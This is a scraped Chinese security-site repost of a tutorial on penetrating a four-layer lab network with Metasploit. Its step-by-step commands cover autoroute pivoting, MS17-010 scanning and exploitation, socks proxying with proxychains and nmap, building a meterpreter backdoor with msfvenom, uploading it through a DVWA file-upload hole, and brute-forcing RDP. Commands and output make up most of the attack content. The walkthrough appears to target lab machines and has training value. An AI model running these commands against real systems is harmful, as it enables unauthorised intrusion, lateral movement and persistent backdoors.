Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:12203 篇
已收录公众号数量:89 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
使用msf入侵多层级网络架构
本文来自公众号:Bypass   2020.06.01 08:00:32


假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何 从Hack的笔记本 层层突破,获取到第4层靶机Server5的系统权限呢?

首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,获悉Server2可连外网、双网卡。 这里,我们以Server2作为攻击跳板机继续入侵。


第1层靶机→第2靶机

1、获取内网网段信息

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.0.0.0/255.255.255.0Local subnet: 10.0.1.0/255.255.255.0

通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。

2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。

meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.1.0/255.255.255.0...[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3[*] Use the -p option to list all active routes

3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。

use auxiliary/scanner/smb/smb_ms17_010 show optionsset rhosts 10.0.1.0/24set threads 50run

通过扫描发现10.0.1.2存在MS-17010漏洞。

4、通过MS-17010漏洞获取Server3的系统权限。

 use exploit/windows/smb/ms17_010_psexec set rhost 10.0.1.2 set payload windows/meterpreter/bind_tcp run

5、成功获取第二层靶机权限,查看ip地址,发现第三个网段。


第2层靶机→第3靶机

1、添加第三个网段的静态理由。

meterpreter > run autoroute -s 10.0.2.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.2.0/255.255.255.0...[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2[*] Use the -p option to list all active routes

2、使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理

use auxiliary/server/socks4aset srvport 9999run

3、在攻击机Kali中,修改配置文件/etc/proxychains.conf

socks4 10.0.0.2 9999

4、使用proxychains 对第三层靶机进行端口扫描:

proxychains nmap -Pn -sT 10.0.2.2 -p1-1000

5、在Firefox中设置socks代理。

本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。


6、利用msfvenom生成木马后门:

msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe
攻击机监听:
use exploit/multi/handlerset PAYLOAD windows/meterpreter/bind_tcpset RHOST 10.0.2.2set LPORT 8888set ExitOnSession falseexploit -j -z

7、在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。

第3层靶机→第4靶机

1、添加第四个网段的静态理由。

meterpreter > run autoroute -s 10.0.3.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.3.0/255.255.255.0...[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2[*] Use the -p option to list all active routes

2、使用msf开启socks

use auxiliary/server/socks4aset srvport 6666run

3、探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。

proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389

4、将第四层目标主机的3389流量转发到代理服务器中。

5、在本地对RDP账号密码进行爆破:

6、爆破成功后,使用账号密码成功登录服务器。